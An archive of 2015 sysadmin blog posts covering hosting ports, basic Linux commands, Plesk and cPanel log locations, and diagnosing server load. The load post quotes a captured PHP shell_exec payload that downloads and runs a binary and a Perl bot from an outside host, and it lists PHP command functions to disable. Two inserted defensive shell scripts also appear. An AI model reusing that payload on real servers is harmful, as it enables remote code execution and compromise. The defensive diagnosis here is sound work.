Thursday, February 26, 2015

Commonly Used Ports -Part1

This is a list of commonly used ports.

cPanel

      cPanel     2082
      cPanel - SSL     2083
      WHM     2086
      WHM - SSL     2087
      Webmail     2095
      Webmail - SSL     2096

Plesk Panel

      Plesk Control Panel     8880
      Plesk Control Panel - SSL     8443
      Plesk Linux Webmail     N/A*
      Plesk Windows Webmail (SmarterMail)     9998**
      Plesk Webmail   8383

Email

      POP3     110
      POP3 - SSL     995
      IMAP     143
      IMAP - SSL     993
      SMTP     25
      SMTP Alternate     26
      SMTP Alternate     587
      SMTP - SSL     465

Web

      HTTP     80
      SSL     443
      FTP     21
      FTPs     990
      SFTP     22
      SFTP Shared/Reseller Servers     2222
      Webdisk     2077
      Webdisk - SSL     2078
      MySQL     3306
      MSSQL     1433
      SSH     22
      SSH Shared/Reseller Servers     2222

Other

      Virtuozzo     4643
      DotNet Panel     9001
      DotNet Panel Login     80

      RDP (Remote Desktop Protocol)     3389

Tuesday, February 24, 2015

Basic Linux Commands -Part 1

The Manual (terminal mode)


man                                This command brings up the online Unix
manual. Use it on each of the commands below.
For Example:   
man pwd                        You will see the manual for the pwd command.

Accessing files in Folders (Directories) in terminal mode


pwd                                Shows what directory (folder) you are in.
In Linux, your home directory is /home/particle
·       Let's suppose you have several data files (data1, data2 ... etc.) in a directory called muondata.
·       Then suppose the directory muondata is an entry in your main home directory, /home/particle .
·       If you are in your home directory (where terminals start) and type pwd, you will see /home/particle.
·       If you were in the muondata directory, pwd would give you /home/particle/muondata instead    
·       The last slash after a directory name is optional.

As you can see, each slash (/) indicates another sub-directory.
cd                                  Changes directories.

Examples of relative movement among directories:
cd muondata                Moves down from your current directory
into the muondata sub-directory

cd ..                            Moves up one directory (yes, include the
two little dots) 

You can also move directly into directories
cd /home/particle/muondata
                   Moves from ANY directory into the muondata
sub-directory of your home directory.

cd ~               Takes you back to your home directory
(/home/particle)

Making or Removing a Directory (terminal mode)


mkdir dirName            Creates a directory with name dirName.

For Example:
mkdir temp             Creates the directory temp.

rmdir dirName      Removes a directory dirName.

For Example:
rmdir temp                  Removes the directory temp.

Looking at or Finding your Files (terminal mode)


ls                                  Lists files.

If you add -al after ls, it will give more details for each file, such as size, permissions, owners, dates, etc.

ls -al                         You'll see a huge list of files that you can't see with the 'ls' command alone and lots of details.

If you see such a long list of files that they scroll off the terminal screen, one way to solve the problem is to use:

ls -al |more       Shows one screen of file names at a time.

less data1         Dumps the contents of the data1 file to your screen with a pause at each line so you don't miss any contents as they scroll. You may move through the file using page up, page down, home and end keys.  When done with less you use the q key to get back to the main terminal.

whereis data1      Shows you the location of the data1 file.

Altering your Files


rm data1                      Deletes the file data1 in the current directory. 

rm -i muon*                Removes all of your muon data files
(careful!!  rm * will remove ALL your files) 
The "-i" makes the computer prompt before removing each file.  If you really want to work without a net, omit the "-i".

cp data1 newdata/    will copy the file data1 to the directory newdata (assuming it has already been created)

mv data1 newdata/    moves the file data1 to the folder newdata and deletes the old one.


Using the Floppy Disk Drive in Linux


mount              Mounts a drive to the operating system.
Linux does not 'see' the floppy drive until
you tell it to.
For Example:
mount /mnt/floppy    Allows you to use the floppy drive which has directory name /mnt/floppy

cp aFile /mnt/floppy/     Copies the file aFile to the floppy disk.

ls /mnt/floppy/           Allows you to see what files are on your floppy.

You may run into problems moving large files onto a 1.44MB floppy disk.  One option to fit larger files is to create a zip archive containing the file onto the floppy.  For Example:

zip /mnt/floppy/myFile.zip muon.myDataRun 
                   Moves the file muon.myDataRun into a zip file on the floppy named myFile.zip

After you are done and before you eject it (this is very, very important), you must unmount the floppy.

umount /mnt/floppy      Allows you to remove the floppy disk

·       Make sure you wait for the command prompt to reappear (this might take a few seconds) before ejecting the floppy. 
·       If you eject the floppy before you unmount the floppy, it may corrupt the data on the floppy and cause the system to be confused if you try to use the floppy again. 
·       If you make a mistake like this, it's probably best to reboot.  Sorry.

df                                  Shows the disk usage. This will tell you how much disk space you have left on your hard drive as well as the floppy.

Monday, February 23, 2015

cPanel vs. Plesk - Side by Side Functionality Comparison

WHM / cPanel versus Plesk 10

WHM/cPanel and Plesk are both feature rich control panels with similar functionality.  They are, however, organized completely differently, have a different security model and use slightly different terminology.

We have several tables comparing each side by side:
  • Functionality & Common Tasks 
  • Account Setup & Security Model 
  • Terminology 

Functionality & Common Tasks


Plesk Panel for Windows service logs and configuration files

Control Panel

  • Logs:
    • Access log: %plesk_dir%\admin\logs\W3SVC<IIS site ID>\ex<date>.log
    • PHP errors: %plesk_dir%\admin\logs\php_error.log
    • Panel log: %plesk_dir%\admin\logs\panel.log
    • Debug logs: %plesk_dir%\admin\logs\plesklog_debugXXXXXXXX.log (create DWORD value Debug=1 in "HKLM\SOFTWARE\PLESK\PSA Config\Config")
  • Service control:
    • Stop: net stop plesksrv /Y
    • Start: net start plesksrv && net start poppassd
    • Restart: net stop plesksrv /Y && net start plesksrv && net start poppassd
  • Configuration:
    • %plesk_dir%\admin\php.ini
    • %plesk_dir%\admin\conf\panel.ini
    • IIS manager > Sites/Application Pools > PleskControlPanel

Web Presence Builder

  • Logs:
    • Error logs: %plesk_dir%\sb\logs\
    • Install/upgrade logs: %plesk_dir%\sb\tmp\
  • No service control (working on IIS)
  • Configuration:
    • %plesk_dir%\sb\config

phpMyAdmin

  • Logs:
    • %plesk_dir%\admin\logs\W3SVC<IIS site ID>\ex<date>.log
  • No service control (working via the plesksrv service).
  • Configuration:
    • %plesk_dir%\admin\htdocs\domains\databases\phpMyAdmin\config.inc.php

ASP.Net Enterprise Manager

  • Configuration:
    • IIS manager > Sites > sqladmin(default) > View Applications > /mssql

myLittleAdmin 2000/2005

  • Configuration:
    • IIS manager > Sites > sqladmin(default) > View Applications > /myLittleAdmin
    • %plesk_vhosts%\sqladmin\myLittleAdmin\2005\config.xml

MailEnable

  • Logs:
    • %plesk_dir%\Mail Servers\Mail Enable\Logging
  • Service control:
    • Stop: net stop meimaps && net stop melcs && net stop memtas && net stop mepops && net stop mepocs && net stop mesmtpcs
    • Start: net start meimaps && net start melcs && net start memtas && net start mepops && net start mepocs && net start mesmtpcs
    • Restart: net stop meimaps && net stop melcs && net stop memtas && net stop mepops && net stop mepocs && net stop mesmtpcs && net start meimaps && net start melcs && net start memtas && net start mepops && net start mepocs && net start mesmtpcs
  • Configuration:
    • %plesk_dir%\Mail Servers\Mail Enable\Bin\MailEnable.msc

Named / BIND

  • Logs:
    • Windows Event Viewer
  • Service control:
    • Stop: net stop named
    • Start: net start named
    • Restart: net stop named && net start named
  • Configuration:
    • %plesk_dir%\dns

Thursday, February 19, 2015

Plesk for Linux services logs and configuration files

Services

Control Panel

  • Logs
    • Error log: /var/log/sw-cp-server/error_log and /var/log/sw-cp-server/sw-engine.log
    • Access log: /usr/local/psa/admin/logs/httpsd_access_log
    • Panel log: /usr/local/psa/admin/logs/panel.log
  • Services
    • Stop: /etc/init.d/psa stop
    • Start: /etc/init.d/psa start
    • Restart: /etc/init.d/psa restart
  • Configuration
    • PHP config: /usr/local/psa/admin/conf/php.ini
    • Panel config: /usr/local/psa/admin/conf/panel.ini
    • Web server config: /etc/sw-cp-server/conf.d/plesk.conf

Web Presence Builder

  • Logs
    • Error log: /usr/local/psa/admin/logs/sitebuilder.log
    • Install/upgrade logs: /usr/local/sb/tmp/
  • No service control (working via sw-cp-server service)
  • Configuration
    • /usr/local/sb/config
    • /etc/sw-cp-server/conf.d/plesk.conf
    • /usr/local/psa/admin/conf/php.ini

SSO

  • Logs
    • Error log: /var/log/sw-cp-server/error_log
    • SSO log: /var/log/sso/sso.log
  • Services
    • No service control (works via sw-cp-server service)
    • Manage settings: /usr/local/psa/bin/sso
  • Configuration
    • /etc/sso/sso_config.ini
    • /etc/sw-cp-server/conf.d/sso.inc

Backup Manager

  • Logs
    • Backup logs: /usr/local/psa/PMM/logs/backup-<datetime>
    • Restore log: /usr/local/psa/PMM/logs/restore-<datetime>
  • Functionality is controlled by the Plesk control panel service
  • Configuration
    • /etc/psa/psa.conf

Migration Manager

  • Logs
    • /usr/local/psa/PMM/logs/migration-<datetime>
  • Functionality is controlled by the Plesk control panel service.

Health Monitor manager

  • Logs
    • /usr/local/psa/admin/logs/health-alarm.log
  • Services
    • Stop: /etc/init.d/sw-collectd stop
    • Start: /etc/init.d/sw-collectd start
    • Restart: /etc/init.d/sw-collectd restart
  • Configuration
    • /usr/local/psa/admin/conf/health-config.xml
    • /usr/local/psa/var/custom-health-config.xml
    • /etc/sw-collectd/collectd.conf

Health Monitor Notification Daemon

  • Logs
    • /usr/local/psa/admin/logs/health-alarm.log
  • Services
    • Stop: /etc/init.d/psa-health-monitor-notificationd stop
    • Start: /etc/init.d/psa-health-monitor-notificationd start
    • Restart: /etc/init.d/psa-health-monitor-notificationd restart
  • Configuration
    • /usr/local/psa/admin/conf/health-config.xml
    • /usr/local/psa/var/custom-health-config.xml

MySQL

  • Logs
    • /var/log/mysqld.log
  • Services
    • Stop: /etc/init.d/mysqld stop
    • Start: /etc/init.d/mysqld start
    • Restart: /etc/init.d/mysqld restart
  • Configuration
    • /etc/my.cnf
    • /etc/mysql/my.cnf (Debian/Ubuntu)

PostgreSQL

  • Logs
    • /var/lib/pgsql/pgstartup.log
  • Services
    • Stop: /etc/init.d/postgresql stop
    • Start: /etc/init.d/postgresql start
    • Restart: /etc/init.d/postgresql restart
  • Configuration
    • /var/lib/pgsql/data/postgresql.conf

Apache

  • Logs
    • Global Access and Error logs: /var/log/httpd/
    • Domain logs: /var/www/vhosts/<domain>/logs
  • Services
    • Stop: /etc/init.d/httpd stop
    • Start: /etc/init.d/httpd start
    • Restart: /etc/init.d/httpd restart
  • Configuration
    • /etc/httpd/conf/httpd.conf
    • /etc/httpd/conf.d/zz010_psa_httpd.conf (includes generated configuration files with the rest of the vhosts and server configuration)
  • NOTE: On SuSE, Debian, and Ubuntu, the service is called "apache2". The path to its logs is /var/log/apache2 and the path to configs is /etc/apache2.

NGINX

  • Logs
    • Error log: /var/log/nginx/error.log
    • Access log: /var/log/nginx/access.log
    • Domain logs: /var/www/vhosts/<domain>/logs/proxy_access*_log
  • Services
    • Stop: /etc/init.d/nginx stop
    • Start: /etc/init.d/nginx start
    • Restart: /etc/init.d/nginx restart
    • NOTE: To disable nginx, go to "Tools & Settings > Services Management" and stop nginx from there.
  • Configuration
    • /etc/nginx/nginx.conf
    • /etc/nginx/conf.d/zz010_psa_nginx.conf (includes generated configuration files with the rest of the vhosts' and server configuration)

Tomcat

  • Logs
    • /var/log/tomcat5/*
  • Services
    • Stop: /etc/init.d/tomcat5 stop
    • Start: /etc/init.d/tomcat5 start
    • Restart: /etc/init.d/tomcat5 restart
  • Configuration
    • /etc/tomcat5/server.xml

FTP

  • Logs
    • /usr/local/psa/var/log/xferlog
    • /var/log/secure
  • No service control (works via xinetd service)
  • Configuration
    • /etc/xinetd.d/ftp_psa
    • /etc/proftpd.conf
    • /etc/proftpd.include

Xinetd

  • Logs
    • /var/log/messages
  • Services
    • Stop: /etc/init.d/xinetd stop
    • Start: /etc/init.d/xinetd start
    • Restart: /etc/init.d/xinetd restart
  • Configuration
    • /etc/xinetd.conf
    • /etc/xinetd.d/* (files with "." in the name are ignored)

BIND

  • Logs
    • /var/log/messages
  • Services
    • Stop: /etc/init.d/named stop
    • Start: /etc/init.d/named start
    • Restart: /etc/init.d/named restart
  • Configuration
    • /etc/named.conf
  • NOTE: In Debian/Ubuntu, the service is called "bind9."

Friday, February 6, 2015

CPanel logs Locations

CPanel logs for access, Apache, email, error, ftp, mysql, WHM

This guide will cover the locations of the log files for things such as access logs,
Apache web server logs, email logs, error logs, ftp logs, MySQL logs, and WHM logs.
If you'd like to have a poster of the 2013 cPanel logs location reference,
you can request them from cPanel directly.
You can also view a digital copy of this poster directly online at go.cPanel.net/logposter.

cPanel logs:

Access logs and user actions
/usr/local/cpanel/logs/access_log
Account transfers and misc. logs
/var/cpanel/logs
Auditing log (account creations, deletions, etc)
/var/cpanel/accounting.log
Backup logs
/usr/local/cpanel/logs/cpbackup
Brute force protection (cphulkd) log
/usr/local/cpanel/logs/cphulkd.log
Cpanel dnsadmin dns clustering daemon
/usr/local/cpanel/logs/dnsadmin_log
Cpanel taskqueue processing daemon
/usr/local/cpanel/logs/queueprocd.log
DBmapping
/usr/local/cpanel/logs/setupdbmap_log
EasyApache build logs
/usr/local/cpanel/logs/easy/apache/
Error log
/usr/local/cpanel/logs/error_log
Installation log
/var/log/cpanel
License updates and errors
/usr/local/cpanel/logs/license_log
Locale database modifications
/usr/local/cpanel/logs/build_locale_database_log
Login errors (CPSRVD)
/usr/local/cpanel/logs/login_log
Horde
/var/cpanel/horde/log/
RoundCube
/var/cpanel/roundcube/log/
SquirrelMail
/var/cpanel/squirrelmail/
Panic log
/usr/local/cpanel/logs/panic_log
Per account bandwidth history (Cached)
/var/cpanel/bandwidth.cache/{USERNAME}
Per account bandwidth history (Human Readable)
/var/cpanel/bandwidth/{USERNAME}
Service status logs
/var/log/chkservd.log
Tailwatch driver tailwatchd log
/usr/local/cpanel/logs/tailwatch_log
Update analysis reporting
/usr/local/cpanel/logs/updated_analysis/{TIMESTAMP}.log
Update (UPCP) log
/var/cpanel/updatelogs/updated.{TIMESTAMP}.log
WebDisk (CPDAVD)
/usr/local/cpanel/logs/cpdavd_error_log
Website statistics log
/usr/local/cpanel/logs/stats_log

cPanel access log

Access logs and user actions
/usr/local/cpanel/logs/access_log

cPanel apache log

Apache restarts done through cPanel and WHM
/usr/local/cpanel/logs/safeapacherestart_log
Domain access logs
/usr/local/apache/domlogs/{DOMAIN}
Processing of log splitting
/usr/local/cpanel/logs/splitlogs_log
suPHP audit log
/usr/local/apache/logs/suphp_log
Web server and CGI application error log
/usr/local/apache/logs/error_log

cPanel email log

Delivery and receipt log
/var/log/exim_mainlog
Incoming mail queue
/var/spool/exim/input/
Log of messages rejected based on ACLS or other policies
/var/log/exim_rejectlog
Unexpected/Fatal error log
/var/log/exim_paniclog
IMAP, POP login attempts, transactions, fatal errors and spam scoring
/var/log/maillog
/var/log/messages

Mailman
/usr/local/cpanel/3rdparty/mailman/logs

MySQL log

MySQL error log
/var/lib/mysql/{SERVER_NAME}.err
MySQL slow query log (if enabled in my.cnf)
/var/log/slowqueries

Load Tackling in Cpanel Servers

As we all know, server stability is directly dependent on server load. Based on my experience as a Linux Server Administrator on cPanel servers, I am writing this article to share some of my ideas regarding load tackling.

Load, in computing, is a "measure of the amount of processing a computer system is currently performing, usually in the form of a scalar and as some variation on a percentage," according to Wikipedia.

This article mainly concentrates on finding the causes of load.

Load Checking Commands

Here are some well-used load checking commands:

w

Shows who is logged on and what they are doing, e.g.:

07:28:29  up 41 days, 20:41,  2 users,  load average: 0.03, 0.09, 0.08

Server time: 07:28:29
Server uptime: up 41 days, 20:41 hrs
Number of users logged in: 2 users
Load average: 0.03, 0.09, 0.08
1-minute load: 0.03
Last 5-minute load average: 0.09
Last 15-minute load average: 0.08

uptime

Same as w command, but uptime won't list the details of users

pstree

Displays a tree of processes.
pstree -apu
is more useful in checking the process list. You can get more details from the man pages.

top

To see currently running processes.

mysqladmin proc stat

Shows the current mysql process details.

Causes of Load

Some causes for load include:
  • High use of some processes
  • Perl script attacks
  • Spamming
  • Php scripts causing the load
  • MySQL Abuse
  • DOS attack
Most abuse issues on the server can be found with the commands in the previous "Load Checking Commands" section.

High Use of Some Processes

You can find it using the command 'top -c' and 'pstree -apu'. Install CSF and configure it to get alerts on "Excessive resource usage."

Set your email address in this file: /etc/csf/resalert.txt

Perl Script Attacks

These attacks are usually caused by poor coding or vulnerabilities in software versions.

If those Perl scripts are running you can see something similar to below after running 'pstree -apu':
===========
├─perl,30478,user
   └─sh,30479 -c echo\\040\"`uname\\040-a`\";echo\\040\"`id`\";/bin/sh
   │       └─sh,30485 
=========== 
How to find the source of the Perl:
root@techyfix [~]# ls -alh /proc/30478 |grep cwd
==========
lrwxrwxrwx 1 user user 0 Sep 28 06:16 
cwd -> /home/user/public_html/media/
===========
You can see the Perl script running from the "/home/user/public_html/media/" folder.

A sample Perl script might look like this example:
===========
   wget http://webstorch.com/a;chmod +x a;mv a sess_vttn737j6k0mci66akhs5u1261398401;./sess_vttn737j6k0mci66akhs5u1261398401; rm a*\');
 shell_exec(\'cd /tmp;curl -O http://webstorch.com/botek.txt;mv botek.txt .sessx;perl .sessxt;rm botek.txt.*;curl -O http://webstorch.com/a;chmod +x a;
 mv a sess_vttn737j6k0mci66akhs5u1261398401;./sess_vttn737j6k0mci66akhs5u1261398401;rm a*\'); 
 ============= 
Also, you can use the command "lsof -p 30478 | less" to get more information.
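
The manual cwd check above can be run across every process at once. The following is an added example, not part of the original article: it lists interpreter and shell processes whose working directory is inside a web root or a temp directory. The function name, the list of process names and the list of directories are assumptions chosen for illustration.

```shell
#!/bin/sh
# Added example (not from the original article).
# Prints "PID NAME CWD" for every perl/sh/php/python process whose working
# directory is a public_html tree or a world-writable temp directory.
# The proc root is an argument so the function can also be pointed at a
# saved copy of /proc collected during incident response.

suspect_procs() {
    proc_root="${1:-/proc}"
    for dir in "$proc_root"/[0-9]*; do
        [ -d "$dir" ] || continue
        pid="${dir##*/}"

        # comm holds the executable name of the process.
        comm="$(cat "$dir/comm" 2>/dev/null)" || continue
        case "$comm" in
            perl|sh|bash|dash|php|python*) ;;   # assumed list of interest
            *) continue ;;
        esac

        # cwd is a symlink to the working directory, the same link that
        # "ls -alh /proc/PID | grep cwd" shows. Reading it needs root for
        # processes owned by other users.
        cwd="$(readlink "$dir/cwd" 2>/dev/null)" || continue
        case "$cwd" in
            */public_html|*/public_html/*|/tmp|/tmp/*|/var/tmp|/var/tmp/*|/dev/shm|/dev/shm/*)
                printf '%s %s %s\n' "$pid" "$comm" "$cwd" ;;
        esac
    done
    return 0
}

# Usage (as root):  suspect_procs
```

Each reported PID can then be examined with lsof -p as described above.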
Preventive measures for blocking such Perl attacks include:
  • Disable allow_url_fopen and allow_url_include in your php.ini (/usr/local/lib/php.ini) file
  • Disable the following functions in PHP:
    disable_functions = exec, shell_exec, passthru, system, escapeshellcmd, escapeshellarg
  • Install mod_security (this also helps in reducing iframe attacks)
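
To confirm that a php.ini actually carries these settings, the following added example (not part of the original article) audits a file for the two URL settings and for the command-execution functions in the list above. The function names are assumptions; the check matches whole names, so a misspelled entry in disable_functions, which leaves the real function enabled, is reported as missing.

```shell
#!/bin/sh
# Added example (not from the original article).

# ini_value FILE KEY -> value of the last uncommented "KEY = value" line,
# with any trailing "; comment" and surrounding double quotes removed.
ini_value() {
    sed -n "s/^[[:space:]]*$2[[:space:]]*=[[:space:]]*//p" "$1" | tail -n 1 |
        sed 's/[[:space:]]*;.*$//; s/^"//; s/"$//'
}

# audit_php_ini FILE -> prints one line per finding, returns 1 if any.
audit_php_ini() {
    ini="$1"; status=0

    # PHP's built-in defaults when a key is absent: fopen On, include Off.
    # An empty value is treated here as unset.
    for pair in allow_url_fopen:on allow_url_include:off; do
        key="${pair%%:*}"; default="${pair##*:}"
        val="$(ini_value "$ini" "$key" | tr 'A-Z' 'a-z')"
        eff="${val:-$default}"
        case "$eff" in
            off|0|false|no|none) ;;
            *) echo "WEAK $key effective=$eff"; status=1 ;;
        esac
    done

    # Wrap the list in commas so only whole function names match.
    disabled=",$(ini_value "$ini" disable_functions | tr -d '[:space:]'),"
    for fn in exec shell_exec passthru system; do
        case "$disabled" in
            *",$fn,"*) ;;
            *) echo "MISSING disable_functions: $fn"; status=1 ;;
        esac
    done
    return $status
}

# Usage:  audit_php_ini /usr/local/lib/php.ini
```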